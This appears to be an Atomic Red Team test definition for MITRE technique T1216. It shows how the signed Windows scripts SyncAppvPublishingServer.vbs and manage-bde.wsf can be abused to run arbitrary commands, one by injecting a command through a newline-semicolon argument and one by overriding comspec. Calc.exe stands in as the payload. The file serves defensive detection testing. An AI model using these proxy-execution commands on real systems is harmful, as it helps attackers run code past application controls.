attack_technique: T1216
display_name: Signed Script Proxy Execution
atomic_tests:
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
  auto_generated_guid: 275d963d-3f36-476c-8bef-a2a3960ee6eb
  description: |
    Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command.
    Upon execution, calc.exe will be launched.
  supported_platforms:
  - windows
  input_arguments:
    command_to_execute:
      description: A PowerShell command to execute.
      type: string
      default: Start-Process calc
  executor:
    command: |
      C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
    name: command_prompt
- name: manage-bde.wsf Signed Script Command Execution
  auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a
  description: |
    Executes the signed manage-bde.wsf script with options to execute an arbitrary command.
  supported_platforms:
  - windows
  input_arguments:
    command_to_execute:
      description: A command to execute.
      type: path
      default: '%windir%\System32\calc.exe'
  executor:
    command: |
      set comspec=#{command_to_execute}
      cscript %windir%\System32\manage-bde.wsf
    cleanup_command: |
      set comspec=%windir%\System32\cmd.exe
    name: command_prompt